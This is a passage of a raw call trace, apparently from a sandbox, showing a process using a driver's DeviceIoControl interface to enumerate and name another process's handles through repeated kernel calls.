Process=0xfffff880053c8558) returned 0x0 [0245.331] PsAcquireProcessExitSynchronization () returned 0x0 [0245.331] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.331] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003886670, HandleInformation=0x0) returned 0x0 [0245.331] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.331] PsReleaseProcessExitSynchronization () returned 0x2 [0245.331] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.331] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.331] ObfDereferenceObject (Object=0xfffffa8003886670) returned 0x1 [0245.331] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.331] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.331] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.331] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.331] PsAcquireProcessExitSynchronization () returned 0x0 [0245.331] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.331] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00103f3f0, HandleInformation=0x0) returned 0x0 [0245.331] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.331] PsReleaseProcessExitSynchronization () returned 0x2 [0245.331] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.331] ObQueryNameString (in: Object=0xfffff8a00103f3f0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.331] ObfDereferenceObject (Object=0xfffff8a00103f3f0) returned 0x1 [0245.331] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.332] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0245.332] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.332] PsAcquireProcessExitSynchronization () returned 0x0 [0245.332] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.332] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038863d0, HandleInformation=0x0) returned 0x0 [0245.332] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.332] PsReleaseProcessExitSynchronization () returned 0x2 [0245.332] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.332] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.332] ObfDereferenceObject (Object=0xfffffa80038863d0) returned 0x1 [0245.332] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.332] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x144, lpOverlapped=0x0) returned 1 [0245.332] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.332] PsAcquireProcessExitSynchronization () returned 0x0 [0245.332] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.332] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003886280, HandleInformation=0x0) returned 0x0 [0245.332] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.332] PsReleaseProcessExitSynchronization () returned 0x2 [0245.332] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.332] ObQueryNameString (in: Object=0xfffffa8003886280, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.332] ObfDereferenceObject (Object=0xfffffa8003886280) returned 0x11 [0245.332] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.332] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.332] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.332] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0245.333] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.333] PsAcquireProcessExitSynchronization () returned 0x0 [0245.333] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.333] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0245.333] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.333] PsReleaseProcessExitSynchronization () returned 0x2 [0245.333] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.333] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.333] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0245.333] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.333] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.333] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.333] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.333] PsAcquireProcessExitSynchronization () returned 0x0 [0245.333] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.333] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037855f0, HandleInformation=0x0) returned 0x0 [0245.333] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.333] PsReleaseProcessExitSynchronization () returned 0x2 [0245.333] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.333] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.333] ObfDereferenceObject (Object=0xfffffa80037855f0) returned 0x1 [0245.333] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.333] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.333] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.333] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.333] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.333] PsAcquireProcessExitSynchronization () returned 0x0 [0245.333] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.333] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.334] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.334] PsReleaseProcessExitSynchronization () returned 0x2 [0245.334] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.334] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.334] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.334] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.334] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.334] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.334] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0245.334] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.334] PsAcquireProcessExitSynchronization () returned 0x0 [0245.334] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.334] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0245.334] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.334] PsReleaseProcessExitSynchronization () returned 0x2 [0245.334] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.334] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.334] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0245.334] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.334] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.334] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.334] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0245.334] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.335] PsAcquireProcessExitSynchronization () returned 0x0 [0245.335] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.335] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010b4080, HandleInformation=0x0) returned 0x0 [0245.335] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.335] PsReleaseProcessExitSynchronization () returned 0x2 [0245.335] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.335] ObQueryNameString (in: Object=0xfffff8a0010b4080, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.335] ObfDereferenceObject (Object=0xfffff8a0010b4080) returned 0x2 [0245.335] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.335] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.335] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.335] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0245.335] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.335] PsAcquireProcessExitSynchronization () returned 0x0 [0245.335] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.335] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a0010acda0, HandleInformation=0x0) returned 0x0 [0245.335] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.335] PsReleaseProcessExitSynchronization () returned 0x2 [0245.335] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.335] ObQueryNameString (in: Object=0xfffff8a0010acda0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.335] ObfDereferenceObject (Object=0xfffff8a0010acda0) returned 0x2 [0245.335] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.335] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.336] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.336] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.336] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.336] PsAcquireProcessExitSynchronization () returned 0x0 [0245.336] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.336] ObReferenceObjectByHandle (in: Handle=0x36c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037d5070, HandleInformation=0x0) returned 0x0 [0245.336] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.336] PsReleaseProcessExitSynchronization () returned 0x2 [0245.336] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.336] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.336] ObfDereferenceObject (Object=0xfffffa80037d5070) returned 0x1 [0245.336] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.336] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.336] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.336] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.336] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.336] PsAcquireProcessExitSynchronization () returned 0x0 [0245.336] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.336] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800380f5f0, HandleInformation=0x0) returned 0x0 [0245.336] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.336] PsReleaseProcessExitSynchronization () returned 0x2 [0245.336] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.336] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.336] ObfDereferenceObject (Object=0xfffffa800380f5f0) returned 0x1 [0245.336] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.336] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.336] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.336] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0245.336] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.336] PsAcquireProcessExitSynchronization () returned 0x0 [0245.337] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.337] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003876070, HandleInformation=0x0) returned 0x0 [0245.337] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.337] PsReleaseProcessExitSynchronization () returned 0x2 [0245.337] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.337] ObQueryNameString (in: Object=0xfffffa8003876070, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.337] ObfDereferenceObject (Object=0xfffffa8003876070) returned 0x2 [0245.337] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.337] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.337] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.337] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.337] PsAcquireProcessExitSynchronization () returned 0x0 [0245.337] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.337] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034ac2e0, HandleInformation=0x0) returned 0x0 [0245.337] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.337] PsReleaseProcessExitSynchronization () returned 0x2 [0245.337] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.337] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.337] ObfDereferenceObject (Object=0xfffffa80034ac2e0) returned 0x1 [0245.337] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.337] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.337] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.337] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0245.337] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.337] PsAcquireProcessExitSynchronization () returned 0x0 [0245.337] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.337] ObReferenceObjectByHandle (in: Handle=0x420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001112640, HandleInformation=0x0) returned 0x0 [0245.337] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.337] PsReleaseProcessExitSynchronization () returned 0x2 [0245.337] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.337] ObQueryNameString (in: Object=0xfffff8a001112640, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.338] ObfDereferenceObject (Object=0xfffff8a001112640) returned 0x2 [0245.338] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.338] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.338] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.338] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0245.338] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.338] PsAcquireProcessExitSynchronization () returned 0x0 [0245.338] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.338] ObReferenceObjectByHandle (in: Handle=0x428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000cac6d0, HandleInformation=0x0) returned 